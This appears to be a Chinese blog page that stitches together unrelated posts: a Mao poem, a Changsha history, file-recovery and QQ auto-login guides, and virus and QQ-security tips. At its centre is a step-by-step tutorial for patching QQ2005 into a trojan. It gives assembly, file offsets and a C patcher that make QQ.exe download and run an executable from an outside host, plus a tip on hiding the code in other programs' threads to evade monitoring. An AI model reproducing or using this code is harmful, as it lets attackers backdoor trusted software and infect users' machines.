小哲部落格 – XiaoZhe'blog

《沁园春66;长沙》
毛泽东
（1925年）

独立寒秋，湘江北去，橘子洲头。

　　　　看万山红遍，层林尽染，漫江碧透，百舸争流。

　　　　鹰击长空，鱼翔浅底，万类霜天竞自由。

　　　　怅寥廓，问苍茫大地，谁主沉浮。

　　　　携来百侣曾游，忆往昔峥嵘岁月稠。

　　　　恰同学少年，风华正茂，书生意气，挥斥方遒。

　　　　指点江山，激扬文字，粪土当年万户侯。

　　　　曾记否，到中流击水，浪遏飞舟。


长沙简介

长沙市是湖南省的省会，有文字可考的历史达3000多年。是具有深厚湖湘文化底蕴的国家历史文化名城和优秀旅游城市。

地理位置

长沙市位于湖南省中部偏东，北和岳阳市、益阳市为邻，西与娄底市交界，南和株洲市、湘潭市接壤，东临江西省萍乡市。地图坐标为东经111°53’－114°5’，北纬27°51’－28°40’，东西长约230公里，南北宽约88公里。地域呈东西向长条形状，是湘中丘陵盆地向洞庭湖平原过渡的地带，地貌北、西、南缘为山地，东南丘陵为主，东北以岗地为主；山地、丘陵、岗地、平原大体各占四分之一。长沙市气候属于亚热带季风性气候，春季潮湿，夏季酷热，秋季凉爽，冬季温暖，全年雨水丰富。位于浏阳境内的大围山七星岭海拔1607.9米，为辖区最高处；岳麓山最高点海拔300.8米，为城区至高点。境内最主要的河流为湘江


历史回眸
长沙一带的人类活动历史可追踪至约20万年以前。商周之前，长沙属于是三苗部落。商周时期则以越人为主体。“长沙”作为地名出现始于西周《逸周书66;王会篇》中，距今约有3000多年历史。
春秋战国时期，长沙逐步纳入楚国版图。经过楚越两族的共同开发，长沙成为了楚国南部一个经济、文化、军事重镇。
秦统一中国后，设长沙郡，为当时全国36郡之一，以今长沙地区为中心，北起洞庭，南逾五岭，东邻鄱阳湖西岸和罗霄山脉，西接沅水流域。
西汉初年，汉高祖刘邦将助其灭秦的秦番阳令吴芮封为长沙王。前202年（高祖五年），将秦的长沙郡改为长沙国，长沙郡附廓之县“湘县”改为“临湘县”，于是长沙首次成为诸侯王国的都城，筑起城墙地位逐渐重要。
三国时期因战略位置的重要，长沙经历了激烈的争夺战争，最终归于孙吴。西晋统一中国以后，又沿袭汉代的分封制。280年(太康十年)，晋武帝封其第六子司马义为长沙王，“以郡为国”。从此直到后来的东晋、南朝，历代封建王朝都曾以长沙为封国(邑)；另外，在地方行政方面，307年（永嘉元年），晋怀帝分荆、江、广州，另立湘州，也以临湘(今长沙)为治所，几经省废，到454年（刘宋孝建元年）才稳定下来，是历史上第一次一湖南境内大半为主要辖区的高层政区。
隋统一中国后，隋文帝改湘州为潭州，设立潭州总管府。长沙郡废除，炀帝时，又进一步改制，潭州又改为长沙郡，从此，辖境广阔的湘州不复存在。但是，长沙作为地方一级行政区划的中心，其地位与作用却是巩固和加强了。隋朝的长沙郡大大地跨越过湘江，达于整个湘中地区，基本上奠定了从此直到清代长沙建置的规模。
621年唐收抚长沙后，即将长沙郡改为潭州，仍以长沙县为治所，宋代为潭州长沙郡治，荆湖南路的转运使司、提点刑狱使司和安抚使司三大衙门都设于潭州城内，其安抚使并由潭州知州兼任。
两宋为长沙经济、文化发展的关键时刻，城市规模比唐五代更为扩大，其城垣四至直到清末也没有超过，人口稠密，汉化水平应经相当高，蔚然成为“湖湘一大都会”。
1279年，元朝确立了对全国的统治。长沙又先后成为元朝湖广行省、湖南道、潭州路和天临路的治所。
明初，是古代长沙政治体制日臻完备与成熟的时期。湖湘平定之初，原湖南宣慰司即行废除。1369年（洪武二年），天临路改名为潭州府，1372年（洪武五年），又改为长沙府，直属湖广行省。至此，明代长沙地区的府、县（州）行政体系最终确立，长沙的行政区划也固定下来，一直延续到清朝末年，长达5个多世纪之久。同时，明代的长沙，还是明王朝的一个藩封重地。而明代直至清初的迁移到此江西的移民非常兴盛。至今，长沙居民中很多人的祖上都来自邻省江西。
清代前中期是长沙古代历史的终结之时，也是其历史发展的一个极为重要的时期，其社会经济、文化又得到了很大的发展。清康熙三年（公元1664年）长沙成为湖南省治。至此，湖南成为一个单独的行政省。两湖分治，是长沙政治历史上的一个重要的政治事件。长沙作为湖南政治、军事、经济、文化中心的地位最终得以确立，而59年后（雍正元年），湖广分闱，长沙士子考升举人便不复再惧洞庭波险。
民国11年（1922年）长沙被定为湖南省省会。当时为适应城市发展，1923年至1924年，巍然屹立于湘水之滨达千年之久的古城墙最终完成了它的历史使命，被大举拆除，仅剩下城南一小段城墙及天心阁被保留下来，如今成为了供人们访古寻幽的千古名胜。民国22年（1933年）长沙市作为一级行政区域正式成立。之后，1938年11月12日的“文夕大火”导致长沙城区80%的房屋被烧毁，战后城市虽进行了重建，但绝大部分地上古迹建筑从此一去不复返了。
1949年8月22日长沙市人民政府成立。共和国建立后，长沙作为湖南省的省会一直至今。



行政区划沿革

1949年8月，长沙市辖8区：城东区、城南区、城西区、城北区、文艺区、金盆区、岳麓区、会春区。

1955年10月，成立东、南、西、北城区4区，区名去掉“城”字。

1957年新设郊区。

1958年12月，长沙县、望城县划归长沙市管辖，开始了长沙市管县的阶段。

1959年2月，撤消郊区。3月，长、望两县合并称长沙县，属长沙市领导。

1977年12月，恢复望城县建置，将长沙县分为长沙、望城两县。1978年底，长沙市辖5区2县。

1983年2月，浏阳、宁乡、湘阴划归长沙市管辖，湘阴县随即划归岳阳地区。

1993年1月，浏阳撤县改市。

1996年，辖区区划调整，撤销郊区，设立芙蓉、天心、岳麓、开福、雨花5区。

据统计，截至2002年12月31日，长沙共辖5区（芙蓉、天心、岳麓、开福和雨花），3县（长沙、望城、宁乡），代管1县级市（浏阳市），之下分为40个乡、76镇、53街道，2961个村和706个居委会。

常用邮件、图片、影像、ZIP、MS Office、声音文件的修复

现在人们越来越多使用电子邮件进行联系，所以电子邮件包含了很多非常重要的个人信息，一旦出现问题，无法打开，损失非常大。因此，掌握一些关于修复故障邮件的办法非常重要。

这里向大家推荐一款非常好的数据修复软件FinalData，具有非常强的修复功能，能修复包括文件分配表FAT、主引导记录MBR、引导扇区、MS Office 文件、影像文件、邮件等对系统和对我们日常工作非常重要的信息。FinalData是一个商业软件，功能最强的是它的企业版，比其它版本对了对于MS Office 文件和邮件的恢复功能。
音樂狂迷提供下载地址是：http://www.FinalData.com

因为FinalData是一个具有非常强劲功能的综合软件，因此在本书的很多修复方式都会涉及它，讲述相关的修复方法。

首先，运行FinalData 2.0 企业版，主界面如图7-2-12。从界面上的主菜单中可以看到有“Office File Recovery”和“Email Recovery”两项，说明软件提供了对于Office文件和邮件的恢复功能。下面我们分别从几类常见的文件如何修复进行讲解。

图7-2-12 FinalData的主界面

1.邮件文件的修复

第一步，单击“Email Recovery”，选择“Start Email Recovery”，选择所修复的邮件所在的驱动器和文件夹，例如“C:Program FilesOutlook Express”，如图7-2-13，单击“OK”。开始查找所有被删除的邮件。

图7-2-13 确定需要修复的邮件文件

第二步，查找结束，出现下一个窗口，把窗口的“END”滑杆拉到最右边，获得恢复的最大值，如图7-2-14，单击“OK”。

图7-2-14 选择查找范围

第三步，开始扫描之前删除的邮件文件，如图7-2-15。

图7-2-15 扫描被删除的文件

第四步，确定你要修复的邮件软件，从邮件文件列表中选择要恢复的邮件文件，因为从列表上看不出邮件的具体信息，无法确定是否恢复。因此，选定一个文件，单击鼠标右键，选择“Recover Message”，以便查看邮件内容。

第五步，邮件文件的列表显示出来，如图7-2-16。选择一个邮件，单击“view message”，以便查看邮件内容。用同样的方法一个一个地查看文件。

图7-2-16 显示被删除的文件列表

第六步，提过查看邮件的内容，确定需要恢复的邮件，然后单击“Recover”按钮，在随后出现的窗口中选择保存邮件的文件夹，但不要在删除以前所保存的位置，开始恢复。

第七步，进入Outlook Express，打开刚才所保存的文件，在再次查看邮件信息是否正确，如果确实无误，单击菜单“打开”中的“移动到文件夹”，接着选择“收信箱”，单击“确定”，将刚才的邮件恢复到原来的收件箱。

这样，一个邮件文件就被恢复了。

2. MS Office 文件的修复

第一步，在FinalData的主界面，单击图标栏的第一个图标或者在菜单“file”中选择“open”，在随后出现的窗口中选择目标驱动器。

第二步，开始扫描磁盘相关数据，将选择范围调至最大，如同上例，如图7-2-17。

图7-2-17 扫描范围调至最大

第三步，开始查找已经被删除的文件和文件夹。然后显示查找结果，如图7-2-18。

图7-2-18 显示查找结果

第四步，选择要修复的文件，然后根据这个文件的类型从菜单项“Office File Recovery”中选择对应的恢复项目，例如Word文件对应菜单选项是“Microsoft Word File Recovery”，其他的菜单选项还有Powerpoint和Excel。

随后出现的窗口显示该文件的基本数据，单击“下一步”，出现文件损坏程度检查窗口，单击“check rate”检查文件损坏程度，显示在右边的小窗口，窗口下部是对于损坏等级的说明，如图7-2-19，单击“下一步”。

图7-2-19 显示文件被破坏的等级

第五步，出现保存窗口，选择文件夹保存这个文件，勾选“Recover All Format”，单击“Start Recovery”，如图7-2-20，开始恢复文件。

图7-2-20 保存修复的文件

第六步，检查一下恢复以后的文件，是否信息完全正确。

3.影像文件的修复

常用的影像文件格式有DivX、AVI、ASF、WMV、WMA、RM等，而这些文件的恢复需要专门针对图像文件的修复软件Video Fixer，但是MPEG格式的文件无法用Video Fixer修复，可以用前面介绍的FinalData修复。

运行Video Fixer，单击窗口左侧的第一个按钮“Add”添加要修复的影像文件，然后单击“fix”修复，窗口下方会显示修复信息和进度，如图7-2-21，最后如果修复成功就保存起来。

图7-2-21 显示修复影像文件的进度

4.修复MPEG1和MPEG2文件

修复修复MPEG1和MPEG2文件仍然用FinalData，而且在选择需要修复的文件驱动器和扫描、查找方式都和修复Office文件类似，只是在选定要修复的文件以后，针对文件类型选择修复方式时，要单击 “Tools” 下的菜单项“Recover a file Partially Damaged”的子菜单“Recover MPEG File”，如图7-2-22。其余过程和修复Office文件一样。

图7-2-22 选择修复的文件类型

5. 修复ZIP文件

为了节省空间，常用压缩文件的形式保存文件。而压缩文件如果出现故障，无法打开，就会造成数据损失。压缩软件本身没有提供修复功能，因此必须借助第三方软件。在这里我们推荐ZIPRepair。它修复压缩包的方式很简单，将原来无法打开的文件包中可以正常使用的数据单独拿出来另外存为一个文件，而且使用简单至极，只要单击界面窗口的“Repair Zip File”按钮，然后选择要修复的ZIP压缩包，随即开始修复，如图7-2-23。

图7-2-23 修复ZIP文件

6. 常见图片文件的修复

大多数人的机器中都存储有很多精美的图片，可能是自己到处精心搜集的，或者是用数码相机拍摄，让美好的赏心悦目的瞬间感觉成为永恒。但是图片文件和其他类型的文件一样，一个误删除，或者数码相机的内存卡出现一些问题，都会让这些美丽的图片瞬间消失。所以你也需要有一个针对这些图片文件的修复工具，有备无患。

这里向大家推荐的是Photo Recovery，以前是一个免费软件，叫做Digita Image Recovery，现在开始收费了。这可是一个功能非常强劲的修复工具，能够修复很多类型的内存卡，包括Flash Card、SmartMedia、SONY Memory Stick、IBM Micro Drive、Multimedia Card、Secure Digital Card 以及 Compact disc，而它能修复的图片文件类型包括：

图片，有JPEG、exif、TIFF、PNG、GIF、BMP、Canon CRW；

音乐影像文件，AVI、MOV、WAV。

Photo Recovery修复图片文件的唯一前提是需要把数码相机的内存卡作为一个独立的驱动器。

Photo Recovery使用非常简单，运行它并找到数码相机内存卡所在的盘符，确定要修复的文件，单击“START”，然后就是耐心等待修复结果了。

音樂狂迷提供下载地址：http://www.le-tech.com

Photo Recovery也有一个令人遗憾的地方，无法修复因为数据写入时数码相机断电所导致的数据丢失。因此我们另外推荐一个软件ImageRecall Lite Edition。这个软件专门修复内存卡因为读取错误而无法读取文件的情况，针对数码相机内存卡特有的问题进行修复。

音樂狂迷提供下载地址：
http://www.imagerecall.com

QQ”永远”运行
自从QQ出现了等级制度之后，现在有不少人都开始了疯狂挂级，希望在联机状态下始终运行QQ，即便被人关闭也能自动启动登录，而且还要防止因异常错误而退出。其实这些事情我们可以使用两个VBS脚本来实现这一目的。

1.QQ自动登录脚本
set fso = Wscript.createObject(“Scripting.FileSystemObject”)
Set f = fso.createTextFile(“QQ自动登录.bat”,true)
f.WriteLine “@echo off” & vbcrlf
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_ ‘列出系统中所有正在运行的程序
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then ‘检测是否QQ或TM
QQCMD=ps.commandline ‘提取QQ程序的命行
tmp=Replace(QQCMD,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
if not len(UIN1)=0 then
QQUIN=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1) ‘取QQ号码.
QQ=QQ+1
QQNUM=QQNUM & “QQ号码” & QQ & “:” & vbtab & QQUIN & vbcrlf
f.WriteLine “ECHO QQ号码:” & QQUIN
f.WriteLine “ECHO 命令行:” & QQCMD
f.WriteLine QQCMD & vbcrlf
end if
end if
next
if not len(QQ)=0 then
MSGBOX “已经成功提取以下QQ号码的自动登录命令行” & vbcrlf & vbcrlf & QQNUM & vbcrlf & “具体请查看当前目录下的文件”,0,”QQ自动
登录命令提取脚本 BY chenall QQ:XXXXXX”
else
msgbox “提取QQ自动登录命令失败,请查看QQ或TM是否正在运行.”,0,”QQ自动登录命令提取脚本 BY chenall QQ:XXXXXX”
f.close
set f = fso.getfile(“QQ自动登录.bat”)
f.delete
end if
将这些代码存储为”*.vbs”文件。然后将所有需要自动登录的QQ号码全部登录，再在一个QQ上点击”菜单”→”一键切换到TM”。此后运行该VBS脚本，会发现在当前目录下生成了一个”QQ自动登陆.bat”的文件，运行该文件即可自动登录所有QQ号码。
小提示：代码中的”XXXXXX”代表你的QQ号。

2.QQ防止关闭脚本
dim QQUIN
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_ ‘列出系统中所有正在运行的程序
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then ‘检测是否QQ或TM
AppPath=ps.commandline ‘提取QQ程序的命行
tmp=Replace(AppPath,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
QQUIN=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1) ‘取QQ号码.
end if
next
if len(QQUIN)=0 then
msgbox “系统中没有运行QQ或TM程序,请重新启动QQ或TM,登陆后再使用一键换切换一下QQ或TM程序,再运行本脚本”
else
do ‘循环检测
myqqin=chkuin(QQUIN) ‘检测上面提取出来的QQ号码是否有在本机打开
if not myqqin then ‘如果没有运行则,重新运行QQ程序并登录
runapp(AppPath) ‘
wscript.sleep 10000 ‘等待10秒
else
wscript.sleep 5000 ‘等待5秒
end if
loop ‘返回继续检测
end if

function RunApp(AppPath)
dim obj
set obj = createobject(“WScript.Shell”)
obj.exec(AppPath)
end function

function chkuin(QQUIN)
for each ps in getobject(“winmgmts:\\.\root\cimv2:win32_process”).instances_
if lcase(ps.name)=”qq.exe” or lcase(ps.name)=”tm.exe” then
AppPatht=ps.commandline
‘by chenall qq 368178720
tmp=Replace(AppPatht,chr(34),space(1))
UIN1=instr(tmp,”QQUIN:”)+6
QQUINTMP=mid(tmp,UIN1,instr(UIN1,tmp,space(1))-UIN1)
if QQUINTMP=QQUIN then chkuin=true end if
end if
next
end function
将以上代码存储为”*.vbs”文件。而后登录QQ，一键切换到TM，再运行VBS脚本。此后，即使关闭了TM/QQ，它也会自动启动并登录至网络。经笔者在Windows XP SP2系统上测试，完全有效。

题外提示：现在腾讯已经取消QQ等级小时制了，新的等级计算方法请去腾讯官方网站查看，本文由 音樂狂迷 引用，为想24小时QQ在线的朋友提供~~

1。思路篇
平心而论，我不怎么喜欢那些全是操作的文章，从头到尾都是先这样，再那样。几乎学不到什么东西。
比如讲某个木马，怎么反弹端口，怎么隐蔽，就是不给出思路的。实在不利于我们菜鸟的学习。牢骚几句，
开始正题：
首先，我们来手工把qq2005做成后门(必要的过程)，然后在具体分析，思路是怎么横空出世的。
因为编程实现不过是把手工的过程变成了自动的过程而已。这里又面临一个选择，是详细写出用ollydbg修改
qq的详细过程，还是一笔带过呢？考虑到《逆》一文中的这个过程被一笔带过了(肯定带来的不少我等菜鸟的痛苦)，
所以我选择详细写出这个过程。这样才算手把手的教，是吧。由于我很讨厌抓图，所以一部分过程我就不抓图了。


用ollydbg打开qq.exe，这时候程序会停在入口点，F2下个断点，为什么呢？因为要么要修改qq的入口代码。
下断点后，很容易在找到这个位置，按ALT+B，双击断点，又回到入口了吧，是不是很方便。呵呵
拖动CPU窗口的滚动条，到qq.exe的尾部，找到一大片的全是 db 0 的地方，这个可以理解为PE的空隙。
我找到的地址是004D4D90，按着鼠标左键向下拖动，选中的部分是黄色的，按CTRL+E或者右键－>二进制->
编辑, 输入要下载的后门的地址：”http://hackor.51.net/mm.exe“(不包括引号)， 回车，看到一堆不知道是什么的汇编代码吧，没有关系，CTRL+A分析一下，好看多了吧，如图1。同样的方法在004D4DCD(距离004D4D90比较远，是为了留出足够的空间来存放比较长的URL)添加”d:\ok.exe”,如图2。继续添加如下汇编代码(为什么这样添加呢，随后给出)：


004D4DEB 60 pushad
004D4DEC 6A 00 push 0
004D4DEE . 6A 00 push 0
004D4DF0 . 68 CD4D4D00 push QQ.004D4DCD ; ASCII “d:\ok.exe”
004D4DF5 . 68 904D4D00 push QQ.004D4D90 ; ASCII “http://hackor.51.net/mm.exe“
004D4DFA . 6A 00 push 0
004D4DFC . E8 CAEBBC75 call urlmon.URLDownloadToFileA
004D4E01 . 61 popad
004D4E02 . 60 pushad
004D4E03 . 6A 05 push 5 ; /ShowState = SW_SHOW
004D4E05 . 68 CD4D4D00 push QQ.004D4DCD ; |CmdLine = “d:\ok.exe”
004D4E0A . E8 26AF9777 call kernel32.WinExec ; WinExec
004D4E0F . 61 popad
004D4E10 . C3 retn
004D4E11 00 db 00
004D4E12 00 db 00
004D4E13 > 60 pushad
004D4E14 . 6A 00 push 0 ; /arg = NULL
004D4E16 . 6A 00 push 0 ; |stksize = 0
004D4E18 . 68 EB4D4D00 push QQ.004D4DEB ; |start = QQ.004D4DEB
004D4E1D . E8 65307377 call MSVCRT._beginthread ; _beginthread
004D4E22 . 61 popad


004D4E23 . 55 push ebp
004D4E24 . 8BEC mov ebp,esp
004D4E26 . 6A FF push -1
004D4E28 .^ E9 30FDF8FF jmp QQ.00464B5D


按CTRL+A分析一下，看到了什么：
004D4DEB . 60 6A 00 ascii “`j”,0
004D4DEB居然变成了这个，呵呵，用ollydbg的小技巧，选中这行，右键->分析->在下一次分析期间，将选择视为命令。呵呵，ok了吧。编辑的时候还会出现其它的不好看的东西，那是ollydbg分析错误导致的，需要手动调整，视为命令，字符等等(具体情形请自行分析)。
现在来回答为什么这样添加的问题：004D4E18处压入的是004D4DEB(也就是URLDownloadToFileA的地址)，这样当这个_beginthread启动的时候，会调用URLDownloadToFileA，去下载我们的mm.exe，紧接着执行WinExec函数，这样我们下载的mm.exe就被执行了，最后用retn返回。其中004D4E22到004D4E26是qq的入口代码，为了不影响qq的运行，我们还是要保存地。下面接着修改qq的入口代码，使之跳到004D4E13去执行我们的_beginthread。注意修改前请先保存，右键－>复制到可执行文件，选择一个文件名就ok了。
修改后(如图3)：
00464B58 Q> 34;$ /E9 B6020700 jmp QQ.004D4E13
00464B5D > |68 18104E00 push QQ.004E1018
修改完成后，右键复制到可执行文件，全部修正。
整个过程要注意堆栈平衡。上面的pushad和popad就是用来保持堆栈平衡的。

2。具体编程实现：
有了前面的过程，这个就简单了。用什么语言实现都一样，看你的个人爱好了。我用的c语言
我们 的程序就是修改qq，把正常的qq.exe修改成上面这样的。那么要修改那些地方呢？
有2个办法，用ollydbg同时开修改后的qq.exe和修改前的qq.exe，对比发现即可。但是不太方便。
还可以使用Hex Workshop，我用的就是这个，它可以比较2个文件，下载地址：http://www.pediy.com/tools/Editors/Hex%20workshop/Hex%20workshop%204.23.zip
安装完成后，打开Hex Workshop，CTRL+K,选择路径，如图4，ok
F6将自动定位到不同之处。
偏移为：
0x64b58
0xD4D90
0xd4dcd
0xd4deb

我们只需要编程修正以上地方的代码就可以了，还有一个问题是，我怎么知道要修正多少个字节呢？
用Hex Workshop计算一下就知道了啊(2个地址相减就ok了)，修正字节数并不要求特别准确。不影响程序的运行就可以了。
整个程序如下(非常简单)：
//winxp sp1 + qq2005


#include
#include
#include


int main(int argc, char* argv[])
{
FILE *fp;
unsigned int i;
int entryPoint[] = {233,182,2,7,0}; //入口要修正的字节
char *pDownURL = NULL; //指向下载URL的指针
char *pPathAndFileName = NULL; //指向文件路径和文件名的指针
int backDoor[] =
{
96,106,0,106,0,104,205,77,77,0,104,144,
77,77,0,106,0,232,202,235,188,117,
97,96,106,5,104,205,77,77,0,232,38,
175,151,119,97,195,0,0,96,106,0,106,
0,104,235,77,77,0,232,101,48,115,
119,97,85,139,236,106,255,233,48,
253,248,255,0
};


if(argc != 3)
{
printf(“tt Make qq to be downloader”);
printf(“ttttngaut All rights reserved.”);
printf(“Usage: %s “, argv[0]);
printf(“%s and qq.exe should at the same directory”, argv[0]);
printf(“The os should be winxp sp1 and The qq version should be 2005”);
printf(“pathAndFileName should like:t d:\\mm.exe not d:\mm.exe”);
return 1;
}

pDownURL = argv[1];
pPathAndFileName = argv[2];

printf(“tt Make qq to be downloader”);
printf(“Cracking……”);

// 1. 打开文件qq.exe ,这个是正常的qq.exe
if ((fp = fopen(“QQ.exe”, “r+”))==NULL)
{
printf(“error!!! Can not open qq.exe!!!”);
printf(“Press any key to continue”);
getchar();
exit(0);
}

//2. set entry point
fseek(fp, 0x64b58, SEEK_SET);
for (i=0; i<5; i++)
{
fputc( (char)entryPoint, fp);
}



// 3. set downURL
fseek(fp, 0x00D4D90, SEEK_SET);

for (i=0; i {
fputc(pDownURL, fp);
}
fputc(0, fp); //这里写入0，因为必须要以0结尾，下同


// 4. set pathAndFileName
fseek(fp, 0xd4dcd, SEEK_SET);

for (i=0; i {
fputc(pPathAndFileName, fp);
}
fputc(0, fp);



// 5. set backDoor code
fseek(fp, 0xd4deb, SEEK_SET);

for (i=0; i<66; i++)
{
fputc( (char)backDoor, fp);
}


fclose(fp);

printf(“Thanks for using, already cracked!!!”);
printf(“ttttngaut All rights reserved.”);

return 0;
}


上面的i用于控制要写入的字节数，并不需要非常精确，但是不要影响程序的执行。每次写入前
都要用fseek函数移动文件指针到指定位置。用ollydbg看看程序的反汇编代码，你会发现backDoor
就是我们后门关键部分对应的汇编代码，上面的程序有个小技巧，那就是如何得到
entryPoint和backDoor数组的内容。而且可以看到它们都是int，使用时才被转化为char
下面的代码用于得到entryPoint数组和backDoor数组的内容(个人方法很巧妙)：
//winxp sp1 + qq2005



#include
#include
#include



int main(int argc, char* argv[])
{
FILE *fp;
unsigned int i;

// 1. 打开文件qq.exe, 注意这个qq是修改过的
if ((fp = fopen(“QQ.exe”, “r+”))==NULL)
{
printf(“error!!! Can not open qq.exe!!!”);
printf(“Press any key to continue”);
getchar();
exit(0);
}


//get entryPoint code
fseek(fp, 0x64b58, SEEK_SET);
for (i=0; i<5; i++)
{
printf(“%d,”, fgetc(fp));
}
printf(“”);

fseek(fp, 0xd4deb, SEEK_SET);

for (i=0; i<67; i++)
{
printf(“%d,”, fgetc(fp));
}
printf(“”);

fclose(fp);


return 0;
}
运行结果如图5，真漂亮，呵呵。


编程介绍完了。怎么样，还算简单吧。
最后补充一点，我们创建线程还是逃不过某些软件的监视，那么我们该怎么解决呢。我们自己不创建就行了，
借用别人的啊，比如flashget多线程下载，再说了，现在太多的软件都创建线程，只要不我们的代码挂上别人的线程就可以了，winxp sp2 和 flashget1.65测试成功，未做更多的测试，应该是可以的。我想这个方法可以叫做借尸还魂吧，呵呵，具体修改过程以及对应的代码分析就不写了，手指都麻了，好了，下次见。


趁自己还年轻，多写点东西贡献给大家。也算是自己人生一大志愿。总体来说我写的东西都很简单，因为我就是一菜鸟，写不出什么高难度的东西来。

网络战正在成为高技术战争的一种日益重要的作战样式，其好处是可以兵不血刃地破坏敌方的指挥控制、情报信息和防空等军用网络系统，甚至可以悄无声息地破坏、瘫痪、控制敌方的商务、政务等民用网络系统，不战而屈人之兵。

美军认为，网络战是为干扰、破坏敌方网络信息系统，并保证己方网络信息系统的正常运行而采取的一系列网络攻防行动。网络战分为两大类：一类是战略网络战；另一类是战场网络战。

　　战略网络战又有平时和战时两种。平时战略网络战是，在双方不发生有火力杀伤破坏的战争情况下，一方对另一方的金融网络信息系统、交通网络信息系统、电力网络信息系统等民用网络信息设施及战略级军事网络信息系统，以计算机病毒、逻辑炸弹、黑客等手段实施的攻击。而战时战略网络战则是，在战争状态下，一方对另一方战略级军用和民用网络信息系统的攻击。

　　战场网络战旨在攻击、破坏、干扰敌军战场信息网络系统和保护己方信息网络系统，其主要方式有：利用敌接受路径和各种“后门”，将病毒送入目标计算机系统；让黑客利用计算机开放结构的缺陷和计算操作程序中的漏洞，使用专门的破译软件，在系统内破译超级用户的口令；将病毒植入计算机芯片，需要时利用无线遥控等手段将其激活；采用各种管理和技术手段，对己方信息网络系统严加防护。当然，战场网络战的作战手段也可用于战略网络战。

　　早在1991年的海湾战争中，美军就对伊拉克实施了网络战。开战前，美国中央情报局派特工到伊拉克，将其从法国购买的防空系统使用的打印机芯片换上了染有计算机病毒的芯片。在战略空袭前，又用遥控手段激活了病毒，致使伊防空指挥中心主计算机系统程序错乱，防空系统的C3I系统失灵。在1999年的科索沃战争中，网络战的规模和效果都有增无减。南联盟使用多种计算机病毒，组织“黑客”实施网络攻击，使北约军队的一些网站被垃圾信息阻塞，北约的一些计算机网络系统曾一度瘫痪。北约一方面强化网络防护措施，另一方面实施网络反击战，将大量病毒和欺骗性信息注入南军计算机网络系统，致使南军防空系统陷于瘫痪

一、病毒杀不死的原因
　　经常听人说，病毒软件报告杀死了某某病毒，可是重新启动后该病毒仍旧存在，无法杀死。病毒杀不死的原因主要有：
　　1.病毒正在运行。由于Windows保护正在运行的程序，所以杀毒软件是无法杀死正在运行的病毒。即使是真的杀死了病毒，电脑正常关机时内存中活动的病毒还会再复制一个病毒到硬盘上。
　　2.病毒隐藏在系统还原的文件夹“_restore”中。

二、对策
　　1.在Windows中杀毒前首先得中止病毒进程。对于WindowsXp/2000，可以使用任务管理器(Ctrl+Alt+Del三键齐按)来查看当前所有的进程，而对于Windows98/Me，则可以使用“黑客入门工具箱”或ATM来查看进程。确定哪个是来历不明的就停止掉或者看哪个不顺眼就停止哪个，该过程俗称“杀进程”。不要怕出错，因为不会对电脑造成任何损坏，最多就是死机。注意，杀进程的操作有时得进行两次才成功。有的病毒有两个进程，互相保护，杀掉一个则会被另一个发现并恢复。此时应先把该病毒在注册表中的启动项去掉，然后用突然断电的方式重启电脑，再杀毒。
　　2.在Windows中使用专杀工具杀毒。得使用最新的杀毒版本。
　　3.禁用系统还原。在WindowsMe中禁用方法是∶鼠标右键点击“我的电脑”-属性-性能-文件系统-疑难解答-禁止系统还原。在WindowsXP中禁用方法是∶控制面板-系统-系统属性-系统还原-在所有驱动器上关闭系统还原。然后用软盘或U盘启动电脑，在dos下删除_RESTORE文件夹。
　　4.在Dos下杀毒不存在杀不死的问题。一般的杀毒软件都可以制作软盘版(含至少3张软盘)，用第一张盘启动(CMOS中必须设定软盘启动在前)后按提示陆续放入其它盘就可以直接杀毒了。瑞星的软盘版需要用鼠标确定杀毒的驱动器，而金山毒霸的软盘版则默认全机查杀。实际上用金山毒霸在DOS下杀毒还可以更简单，用普通软盘启动盘或U盘启动盘启动电脑后，先换到C盘，然后进入金山毒霸的目录(命令：cd kav或cd kav5，与版本有关)，然后输入KAVDX，回车就开始杀毒了。
　　5.补充操作。病毒杀死后还应该修复注册表~~~~

本文由红客联盟提供，音樂狂迷引用~

QQ因它在网络的特殊地位，受到越来越多的黑客的关注，也越来越多的菜鸟们QQ频频被盗，实在冒火。下面我就将我在QQ防黑方面的经验和一些很有用的小点子拿来给菜鸟们分享，希望能对广大的菜鸟们有所帮助。（本文主要向菜鸟们讲述QQ安全防范知识，所以一些高深的技术和原理，我只提供一个思路不作细究，相关黑客软件也不做详细介绍和提供下载，望广大老鸟们和对这些方面感兴趣的朋友谅解。本文以QQ2000和Windows2000做为技术背景，大部分内容对其他版本的QQ及操作系统也有效。）

常见QQ攻击方法：
1、暴力破解
用暴力破解+好的密码词典来对本地的QQ密码文件或在线QQ配合好的密码词典进行暴力破解。

2、专门的破解工具
这类软件一种是直接破解出曾经选择过“下次登录不显示登录框”的本地QQ号
的最后一次的密码，一种是使用了叫做“隐身穿墙术”的QQ黑软，通过一个独立的执行文件调用QQ主程序，跳过密码验证直接登录QQ。

3、使用木马程序
通过诱骗目标去浏览藏有QQ木马的网页，让木马自动下载并运行，或向目标发送绑捆了木马的软件、图片等文件让其执行。木马通过获取QQ登录窗口密码或记录击键记录盗取密码，并发向指定Email（黑基赠送给黑基会员的盗QQ密码的软件就是这类软件）或保存在计算机的指定位置。

4、破解注册QQ密码保护登记的Emai密码
通过破解目标注册QQ密码保护邮箱的密码来获得你的QQ密码。

5、利用QQ软件本身的漏洞
利用QQ软件本身的漏洞来向目标发送攻击信息，使其被迫下线或造成QQ程序错误退出。

防范措施：
一、最最基本的防范：一定要申请密码保护。（千万不要亡羊补牢哦）
二、针锋相对的防范：
1、对于暴力破解：
①一个复杂的密码是关键，8位以上的数字+大小写字母+符号，这样的设置是对暴力破解者耐心的一个挑战，要是在线破解这也将是对其经济实力的挑战。
②下线后删除保存有你QQ号码记录的文件夹，防止本地密码文件的破解。
③登录QQ时可以在号码前加很多的0登录，这样可以躲过qqdreams等一类的在线破解软件对你的QQ号的探测。
④使用QQ代理，不轻易和对方进行“二人世界”聊天以隐藏自己的真实ip ，避免在线破解。
2、对于专门的破解软件：
①下线后删除保存有你QQ号码记录的文件夹。
②登录QQ时不要选择保存密码。
